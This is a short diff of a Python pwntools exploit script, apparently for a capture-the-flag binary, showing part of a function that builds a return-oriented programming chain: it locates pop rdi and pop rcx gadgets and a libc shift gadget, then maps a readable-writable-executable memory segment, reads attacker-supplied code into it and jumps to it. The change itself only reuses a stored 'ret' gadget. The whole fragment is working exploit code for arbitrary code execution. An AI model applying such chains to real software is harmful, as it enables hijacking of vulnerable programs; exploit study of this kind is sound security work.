|
|
@@ -88,8 +88,9 @@ def try_char(offset, char):
|
|
|
|
|
|
pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
|
|
|
pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
|
|
|
+ ret = rop.find_gadget(['ret'])
|
|
|
|
|
|
- rop.raw(rop.find_gadget(['ret']))
|
|
|
+ rop.raw(ret)
|
|
|
rop.raw(pop_rcx_ret)
|
|
|
rop.raw(32)
|
|
|
rop.raw(pop_rdi_ret)
|
|
|
@@ -101,9 +102,7 @@ def try_char(offset, char):
|
|
|
else:
|
|
|
rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
|
|
|
|
|
|
- rop.raw(rop.find_gadget(['ret']))
|
|
|
rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
|
|
|
-
|
|
|
rop.read(0, new_segment, 100)
|
|
|
rop.call(new_segment)
|
|
|
|
Roman Hergenreder